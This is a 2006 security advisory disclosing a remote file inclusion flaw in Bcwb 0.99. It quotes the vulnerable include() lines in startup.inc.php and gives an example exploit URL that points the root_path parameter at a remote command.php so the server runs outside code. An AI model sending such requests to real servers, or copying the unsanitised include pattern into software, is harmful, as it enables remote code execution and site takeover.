Bcwb 0.99(root_path)Remote File Include Vulnerability

2006-09-20T00:00:00
ID SECURITYVULNS:DOC:14353
Type securityvulns
Reporter Securityvulns
Modified 2006-09-20T00:00:00

Description


Title : Bcwb 0.99(root_path)Remote File Include Vulnerability

Author : ajann

Greetz : shadow and Suskun for host : )

Exploit;


[File] startup.inc.php [/File]

[Code,1] startup.inc.php Error:

.. .... // Debug services include($root_path.'include/startup/debug.inc.php'); include($root_path.'include/startup/common_functions.inc.php'); include($root_path.'include/lib/data.lib.php'); .... ..

Key [:] root_path=http://target.com/command.php?

\Example:

http://target.com/include/startup.inc.php?root_path=http://target.com/command.php?

ajann,Turkey

...

Im not Hacker!